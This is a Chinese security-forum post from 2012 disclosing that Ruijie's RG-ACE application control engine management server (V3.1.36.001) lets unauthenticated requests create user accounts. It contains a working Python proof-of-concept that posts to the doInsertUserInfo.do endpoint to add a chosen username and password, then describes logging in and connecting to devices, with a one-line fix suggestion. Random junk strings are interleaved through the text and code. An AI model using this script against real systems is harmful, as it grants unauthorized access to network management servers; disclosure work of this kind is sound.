找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2076|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)+ U5 z5 g" r, h7 }6 V2 |
- L& D" N2 A5 b1 a- Z0 d
$ P8 {  k; x; S! X' k
测试的具体版本是0 ^, @. x( t3 p2 Z# X& M5 E# e$ g
产品名称: 锐捷应用控制引擎$ k# v2 {+ ?% c+ L- q
版本号: 3.1.36.001 TC
( j- t) I0 k7 `: k' I1 o编译时间: 201104291730
. b; |, u$ B5 k% Q
4 R3 N% O* v1 G  h3 k. f
$ q6 k" M, R5 J: M6 d7 J漏洞证明:
) {7 P+ F2 I( R5 p  x! C ; E2 d- x; G( o7 C- Y+ M* t& C
) }" Q5 ~4 z- `- v+ d0 ^3 V2 b6 ^

1 Z6 ]2 A9 [/ ~: F+ g$ _) l! {# c: L
' y. L& |7 \/ U- ~3 V+ _4 v5 K# e! G" y- R
  C) U, p& N1 h  i' s
执行脚本
* U3 J  V# ?9 Y4 q#! /usr/bin/env python
3 b; J/ Q" \4 a# E" p8 S* T#coding=gbk
+ g5 ?6 f1 ]" \4 s#RG-ACE管理服务器 V3.1.36.001
) c  j9 k7 F7 P( _) H9 s  J& Bimport urllib2, urllib,cookielib
; r5 r" k3 z+ J0 t; _# p3 burl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
$ G) C0 F0 O* ~, h0 X5 |opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
0 ~5 w* @( t* r$ jopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]  g0 f% ?' L: b+ h1 n4 y
post=(("event","userManager.doInsertUserInfo"),3 P1 |" N8 S" K" j0 f0 D
("useractionname","addButtonValue"),
0 `3 n7 t+ _  t/ l: Y' s("useropermanager","userManager"),
# B% D; w" G  L# l  @("userName","t"), #######账号自己加. C$ O4 _7 q2 I" j" E! R
("pwd","aaaaaa"),######密码自己加) M- _4 Y1 Y% o: @' B% N- U( A$ z
("trueName","ad"),& b, m. {" [/ `- K
("email",""),% D9 s3 B5 _& ]& E- i8 t
("mobilePhone",""),1 i4 ^3 b# W7 y- _
("officePhone",""),
% T3 i- a2 Y: }  O, ?, k("addr",""),! i6 z- r' V$ H0 {% A: r8 m
("submit","确定"))) d% h+ Y0 Y+ m- m5 d% T
urllib2.install_opener(opener), r9 J3 ^; t/ b0 H1 ~
p=urllib2.urlopen(url, urllib.urlencode(post)).read()* z5 Q) ~9 Y! f3 F! J
print "Done"$ J! A7 u% \5 G7 }) u, O' E* k: T

. _: T, {6 X; t+ v& h3 z登录,连接设备
) J. E* \) [# O$ e* Z
# J% I, }% Z# X1 N: @. Q: w) @1 D7 x8 J* b

/ s* I! u8 ?% }: h# u* t$ w  ~( n& {4 K' P
; x# Q) \& Z- W; Z) L) e
默认的管理员admin权限更大点
& v# o- k4 s4 @. u: X! \% C
  L; Q. b6 I5 {
  X# C: I/ D+ L; o
5 R$ J$ ~! g- N$ J! @& z2 |1 \, a" w
6 l. p" H0 S# ]: r9 j* \
3 I8 y, B6 c1 j" e' ^+ a修复方案:
0 O2 L& L8 s3 j! F  b  P加强对接口的权限验证
3 {; G! h1 T* r
4 P! G1 q1 i" W+ Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表